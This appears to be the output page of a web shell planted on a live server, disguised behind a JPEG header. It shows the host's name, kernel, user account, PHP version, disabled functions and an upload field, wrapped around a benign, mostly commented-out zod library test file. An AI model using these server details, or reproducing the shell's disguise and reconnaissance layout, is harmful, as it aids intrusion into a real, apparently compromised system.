ÿØÿà JFIF ` ` ÿþ
|
Server : Apache System : Linux cloud.heroica.com.br 4.18.0-553.36.1.el8_10.x86_64 #1 SMP Wed Jan 22 03:07:54 EST 2025 x86_64 User : farolpborg ( 1053) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /var/www/node_services/apimetaexamepopular/node_modules/zod/src/v4/mini/tests/ |
Upload File : |
import { expect, test } from "vitest";
// import * as z from "zod/v4/core";
test("z.function", () => {
expect(true).toEqual(true);
});
// test("z.function", () => {
// const a = z.function({
// args: z.tuple([z.string()]),
// returns: z.string(),
// });
// const myFunc = a.implement((name: string | number) => `Hello, ${name}!`);
// expect(myFunc("world")).toEqual("Hello, world!");
// expect(() => myFunc(123 as any)).toThrow();
// // this won't run
// () => {
// // @ts-expect-error
// const r = myFunc(123);
// expectTypeOf(r).toEqualTypeOf<string>();
// };
// });
// test("z.function async", async () => {
// const b = z.function({
// args: z.tuple([z.string()]).$check(async (_) => {}),
// returns: z.string().$check(async (_) => {}),
// });
// const myFuncAsync = b.implementAsync(async (name) => `Hello, ${name}!`);
// expect(await myFuncAsync("world")).toEqual("Hello, world!");
// expect(myFuncAsync(123 as any)).rejects.toThrow();
// // this won't run
// () => {
// // @ts-expect-error
// const r = myFuncAsync(123);
// expectTypeOf(r).toEqualTypeOf<Promise<string>>();
// };
// });